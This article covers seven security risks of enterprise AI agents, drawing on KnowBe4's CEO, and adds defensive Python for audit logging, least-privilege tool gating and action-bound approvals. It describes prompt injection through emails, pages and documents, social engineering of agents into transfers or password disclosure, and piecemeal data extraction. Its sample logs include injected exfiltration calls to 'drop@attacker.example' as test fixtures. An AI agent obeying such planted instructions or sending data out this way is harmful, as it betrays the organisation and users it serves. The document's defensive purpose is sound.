7 Critical Security Risks of Untrained AI Agents — And How to Address Them

The rise of autonomous AI agents promises a productivity revolution for enterprises, but it also introduces a new class of security vulnerabilities. These agents, designed to act independently, lack the innate caution of human employees — they don't know that bad actors exist. According to Stu Sjouwerman, CEO of KnowBe4, this naivety makes them prime targets for exploitation. As organizations rush to deploy AI without robust governance, the gap between adoption and security is widening. This article explores seven key threats posed by untrained AI agents and offers actionable strategies to mitigate them.

1. The Dual-Threat Landscape of AI Security

Enterprises face a dual challenge: AI agents boost productivity but also expand the attack surface. The same autonomy that enables them to handle complex tasks allows attackers to manipulate them. Most organizations have no governance framework to manage either risk — they lack policies for how AI should respond to requests, what data it can access, or how it should verify user identity. This creates a scenario where agents can inadvertently expose sensitive information or execute harmful actions. To close the gap, companies must implement security-by-design principles from the start, integrating governance into AI development rather than as an afterthought.

Source: siliconangle.com

2. AI Agents Don't Recognize Malicious Intent

Unlike humans, who learn from social cues and experience, AI agents operate on predefined rules or trained models. Until they are specifically trained to detect phishing, persuasion, or social engineering tactics, they will treat every request as legitimate. Sjouwerman highlights that these agents “don’t know bad people exist”: they lack the suspicion that protects humans. This makes them vulnerable to prompt injection, where instructions planted in content the agent processes (an email it is asked to summarize, a web page it retrieves, a document in a shared drive) are followed as if they had come from the user. Adversarial training data that simulates real-world manipulation helps agents flag suspicious commands for human review, but no current model reliably separates instructions from data, so training must be paired with architectural controls: treat every piece of retrieved content as untrusted, and check each tool call the model proposes against what the user actually authorized.

3. Expanded Attack Surface Without Visibility

Every connected AI agent represents a new entry point for attackers. Traditional security tools such as firewalls and endpoint protection were not designed to monitor the behavior of autonomous agents, whose activity looks like legitimate API traffic from an authorized service account. Without a log of each tool call, its arguments, the user on whose behalf it ran and the approval it carried, organizations cannot detect when an agent has been compromised or is acting abnormally, and tracing a breach back to its origin becomes nearly impossible. A recommended remediation is agent-specific monitoring that records every action in an audit trail, alerts on calls outside the agent's declared tool set or on unusual call volumes, and enforces authorization (not merely authentication) for any action that modifies data or systems.
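The audit-and-alert logic described above, as an added example in Python that is not code from the SiliconANGLE article or from KnowBe4. The agent profiles, the tool names, the "write tool" set and the JSON log lines are constructed for illustration; a real deployment would emit the same fields from the layer that executes tool calls.

```python
"""Agent action audit log with simple anomaly checks (added example).

Each line of the log is one tool call made by an agent. The checks flag:
  1. a call to a tool outside the agent's declared profile (possible hijack),
  2. a write action with no approval id (human-in-the-loop bypassed),
  3. a burst of calls to one tool in one session (piecemeal extraction or a runaway loop).
"""
import json
from collections import Counter

# Constructed agent profiles: the tools each agent is declared to use.
AGENT_PROFILES = {
    "mail-summarizer": {"read_mailbox", "summarize"},
    "finance-bot": {"read_ledger", "create_payment"},
}
# Constructed set of tools that change state and therefore need an approval id.
WRITE_TOOLS = {"create_payment", "update_config", "send_external"}

# Constructed sample log: one JSON object per line.
SAMPLE_LOG = """\
{"ts":"2024-05-01T10:00:01Z","agent":"mail-summarizer","session":"s1","tool":"read_mailbox","args":{"folder":"inbox"},"approval_id":null}
{"ts":"2024-05-01T10:00:02Z","agent":"mail-summarizer","session":"s1","tool":"summarize","args":{},"approval_id":null}
{"ts":"2024-05-01T10:00:03Z","agent":"mail-summarizer","session":"s1","tool":"send_external","args":{"to":"drop@attacker.example"},"approval_id":null}
{"ts":"2024-05-01T10:05:00Z","agent":"finance-bot","session":"s2","tool":"read_ledger","args":{},"approval_id":null}
{"ts":"2024-05-01T10:05:01Z","agent":"finance-bot","session":"s2","tool":"create_payment","args":{"amount":9500},"approval_id":"apr-77"}
{"ts":"2024-05-01T10:05:02Z","agent":"finance-bot","session":"s2","tool":"create_payment","args":{"amount":9500},"approval_id":null}
"""


def parse_log(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_anomalies(events, profiles=AGENT_PROFILES, write_tools=WRITE_TOOLS, burst_limit=20):
    """Return a list of (session, reason) findings for the three checks above."""
    findings = []
    per_session_tool = Counter()
    for e in events:
        allowed = profiles.get(e["agent"], set())
        if e["tool"] not in allowed:
            findings.append((e["session"], f"undeclared tool {e['tool']!r} used by {e['agent']}"))
        if e["tool"] in write_tools and not e.get("approval_id"):
            findings.append((e["session"], f"write action {e['tool']!r} without approval id"))
        per_session_tool[(e["session"], e["tool"])] += 1
    for (session, tool), n in per_session_tool.items():
        if n > burst_limit:
            findings.append((session, f"{n} calls to {tool!r} exceed burst limit of {burst_limit}"))
    return findings


if __name__ == "__main__":
    for session, reason in find_anomalies(parse_log(SAMPLE_LOG)):
        print(session, reason)
```

Against the constructed log this reports the summarizer's `send_external` call twice (undeclared tool, and a write with no approval) and the second `create_payment`, which reused the amount of an approved payment but carried no approval of its own. The burst check is deliberately crude; in practice the threshold would be per tool and per agent, but the point is that the signal only exists if every call is logged with agent, session, tool and approval fields.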

4. Data Leakage Through Over-Permissive Access

To function effectively, AI agents often require access to large amounts of corporate data: customer records, internal documents, financials. Without strict role-based access controls (RBAC), agents may leak data inadvertently. For example, an agent that summarizes emails might expose confidential discussions if it has blanket read permissions across every mailbox. Attackers can exploit this by crafting queries that extract sensitive information piece by piece, each request small enough to look routine. Enterprises should apply the principle of least privilege: grant agents only the minimum data access needed for their task, scope that access to the task or session rather than to the agent as a whole, cap the volume of records a session may retrieve, and require explicit user confirmation before releasing any data to external parties.
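A deny-by-default policy gate for tool calls that enforces the least-privilege points above and also blocks the injected exfiltration described in section 2, as an added example in Python (not code from the article or from KnowBe4). The task scope, tool names, mailbox identifiers and the list of "proposed" calls are constructed; in a real pipeline `authorize` would sit between the model's proposed tool call and its execution, and the confirmed-recipient set would be populated from a user action the model cannot perform.

```python
"""Least-privilege gate for agent tool calls (added example).

The model may propose any call it likes; nothing runs unless `authorize`
finds it inside the session's scope. Scope is per task, not per agent.
"""
from dataclasses import dataclass, field


@dataclass
class TaskScope:
    """Grant for one task: tools it may call and data it may touch. Anything not listed is denied."""
    tools: frozenset
    mailboxes: frozenset                      # constructed data scope
    max_records_per_session: int = 50         # budget against piecemeal extraction
    external_release_requires_confirmation: bool = True


@dataclass
class Session:
    scope: TaskScope
    confirmed_recipients: set = field(default_factory=set)  # set by the user, never by the model
    records_returned: int = 0


class PolicyDenied(Exception):
    pass


def authorize(session: Session, tool: str, args: dict) -> None:
    """Raise PolicyDenied unless the call is within scope. Runs before the tool executes."""
    scope = session.scope
    if tool not in scope.tools:
        raise PolicyDenied(f"tool {tool!r} not granted to this task")
    if tool == "read_mailbox":
        if args.get("mailbox") not in scope.mailboxes:
            raise PolicyDenied(f"mailbox {args.get('mailbox')!r} outside data scope")
        n = int(args.get("limit", 1))
        if session.records_returned + n > scope.max_records_per_session:
            raise PolicyDenied("record budget exhausted; possible piecemeal extraction")
        session.records_returned += n
    if tool == "send_external":
        to = args.get("to", "")
        if scope.external_release_requires_confirmation and to not in session.confirmed_recipients:
            raise PolicyDenied(f"external release to {to!r} lacks user confirmation")


def run_proposed_calls(session: Session, proposed):
    """Apply the gate to each proposed (tool, args) pair; return (executed, denied)."""
    executed, denied = [], []
    for tool, args in proposed:
        try:
            authorize(session, tool, args)
            executed.append((tool, args))
        except PolicyDenied as why:
            denied.append((tool, str(why)))
    return executed, denied


# Constructed scenario: an email-summarizer task for one user's mailbox.
SUMMARIZER = TaskScope(tools=frozenset({"read_mailbox", "summarize", "send_external"}),
                       mailboxes=frozenset({"alice@corp.example"}))
# Constructed calls "proposed by the model". The third is what an injected
# instruction inside an email would try to make it propose.
PROPOSED = [
    ("read_mailbox", {"mailbox": "alice@corp.example", "limit": 20}),
    ("summarize", {}),
    ("send_external", {"to": "drop@attacker.example"}),              # injected exfiltration
    ("read_mailbox", {"mailbox": "cfo@corp.example", "limit": 5}),   # outside data scope
    ("update_config", {"key": "forwarding"}),                         # tool never granted
]

if __name__ == "__main__":
    sess = Session(scope=SUMMARIZER)
    done, blocked = run_proposed_calls(sess, PROPOSED)
    print("executed:", [t for t, _ in done])
    for tool, why in blocked:
        print("denied:", tool, "->", why)
```

The same `send_external` call passes once the recipient is in `confirmed_recipients`, which is the point: the confirmation is a separate user action, so text that an attacker smuggles into the agent's input cannot satisfy it. The record budget is what turns "extract it piece by piece" into a visible denial rather than a slow leak.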

5. Lack of Governance Frameworks Accelerates Risk

The speed of AI adoption has outstripped the creation of governance frameworks. Many organizations deploy AI agents without defined policies for acceptable use, data handling, or incident response. This governance gap is the defining security risk of the current era, as Sjouwerman notes. Without clear guidelines, employees may unknowingly give agents harmful commands, or agents may autonomously engage in risky behavior. To address this, companies should establish an AI Governance Board that includes security, legal, and business leaders. They should create a charter that outlines agent behavior limits, escalation paths for suspicious activity, and periodic security reviews.


6. Social Engineering Attacks on AI Agents

Just as humans can be manipulated, AI agents can be socially engineered, sometimes more easily. Because agents lack emotional intelligence and context awareness, they may follow instructions from unauthorized users who mimic an authoritative tone or spoof internal communications. Attackers can trick an agent into performing actions like transferring funds, revealing passwords, or modifying system configurations. Prevention requires strong identity verification for any command that has security or financial impact: the agent should act on the authenticated identity of the user who issued the request, never on who the text claims to be. Require multi-factor authentication for administrative actions even when they are initiated through an agent, and route high-impact commands through out-of-band confirmation by the responsible human, so that an attacker who controls the agent's input channel cannot also supply the confirmation.

7. Path Forward: Continuous Training and Human Oversight

The solution is not to abandon AI agents but to train and test them continuously. Just as organizations conduct security awareness training for employees, they must run simulated attacks against their AI agents: red-teaming them with social engineering payloads, prompt injections, and privilege escalation attempts, and re-running those tests whenever the model, its tools, or its prompts change. Furthermore, critical decisions should always require a human in the loop: an agent can recommend, but a human must approve, and the approval must be bound to the specific action so it cannot be reused for a different one. By combining ongoing training with human oversight, enterprises can harness the power of autonomous agents without becoming victims of their naivety.
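One way to implement a human approval that is bound to the exact action, covering both the out-of-band verification point in section 6 and the human-in-the-loop requirement above, as an added example in Python (not code from the article or from KnowBe4). The approval key, the action fields, the approver identity and the timestamps are constructed; in production the key lives with the approval service, and the agent only ever sees the resulting token.

```python
"""Action-bound human approval tokens (added example).

A human reviews a proposed action through a channel the agent does not
control; the approval service then issues an HMAC over the canonical
action, the approver and an expiry. The executor refuses anything whose
parameters differ from what was approved, so a token for one transfer
cannot be replayed for a different recipient or amount.
"""
import hashlib
import hmac
import json


def canonical(action: dict) -> bytes:
    """Deterministic encoding so the MAC covers every parameter, in a fixed order."""
    return json.dumps(action, sort_keys=True, separators=(",", ":")).encode()


def _message(action: dict, approver: str, expires: int) -> bytes:
    return canonical(action) + b"|" + approver.encode() + b"|" + str(expires).encode()


def issue_approval(key: bytes, action: dict, approver: str, now: float, ttl: int = 300) -> dict:
    """Approval-service side: called only after a human has reviewed `action`."""
    expires = int(now) + ttl
    mac = hmac.new(key, _message(action, approver, expires), hashlib.sha256).hexdigest()
    return {"approver": approver, "expires": expires, "mac": mac}


def verify_approval(key: bytes, action: dict, approval: dict, now: float) -> bool:
    """Executor side: the approval must cover this exact action and be unexpired."""
    if now > approval["expires"]:
        return False
    expected = hmac.new(key, _message(action, approval["approver"], approval["expires"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, approval["mac"])   # constant-time comparison


def execute_if_approved(key: bytes, action: dict, approval: dict, now: float) -> str:
    """Gate in front of the real tool: only an approved action is executed."""
    if not verify_approval(key, action, approval, now):
        return "denied"
    return f"executed {action['type']}"


# Constructed scenario: a payment the agent wants to make.
KEY = b"constructed-approval-service-key"
T0 = 1_700_000_000
PAYMENT = {"type": "transfer", "amount": 9500, "currency": "USD", "to": "ACCT-1234"}

if __name__ == "__main__":
    approval = issue_approval(KEY, PAYMENT, approver="cfo@corp.example", now=T0)
    print(execute_if_approved(KEY, PAYMENT, approval, T0 + 10))
    tampered = dict(PAYMENT, to="ACCT-9999")   # recipient swapped, approval replayed
    print(execute_if_approved(KEY, tampered, approval, T0 + 10))
    print(execute_if_approved(KEY, PAYMENT, approval, T0 + 600))   # past expiry
```

Two things this does not do on its own: it does not stop the same approved action from being executed twice inside the token's lifetime (add a one-time approval id recorded by the executor if duplicate execution matters), and it does not verify who the approver is (the approval service must authenticate the human, with MFA for financial actions, before calling `issue_approval`).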

In conclusion, the rise of untrained AI agents presents a clear and present danger to enterprise security. From governance gaps to social engineering vulnerability, the risks are real but manageable. Organizations that act now to implement governance frameworks, train their agents, and maintain human oversight will be best positioned to safely leverage AI’s transformative potential. The key takeaway from KnowBe4’s CEO is simple: treat your AI agents like new employees — onboard them with security training, monitor their behavior, and never assume they know that bad people exist.
